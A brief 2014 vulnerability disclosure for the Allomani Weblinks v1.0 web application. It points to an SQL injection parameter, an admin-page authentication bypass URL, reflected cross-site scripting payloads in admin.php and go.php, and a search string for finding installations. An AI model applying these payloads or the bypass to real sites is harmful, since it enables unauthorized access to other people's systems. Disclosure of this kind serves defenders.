facebook facebook twitter rss

Allomani Weblinks v1.0 Multi Vulnerability

Author: indoushka , Published: 11-11-2014
Allomani Weblinks v1.0 Multi Vulnerability
=====================================
Author : indoushka
Vondor : http://www.allomani.com/
Dork : جميع الحقوق محفوظة لـ : اللوماني © 2014
برمجة اللوماني للخدمات البرمجية © 2006
======================================

Sql injection :

http://127.0.0.1/public_html/index.php?action=browse&cat=1 (inject her)

cpanel : http://127.0.0.1/public_html/admin.php

By Pass :

http://127.0.0.1/public_html/admin_menu.html

Cross site scripting (verified) :

Affected items
/public_html/admin.php
/public_html/go.php

URI was set to "onmouseover='prompt(929220)'bad=">
The input is reflected inside a tag parameter between double quotes.
URL encoded GET input id was set to 12'"()&%<ScRiPt >prompt(983476)</ScRiPt>

Like us on Facebook :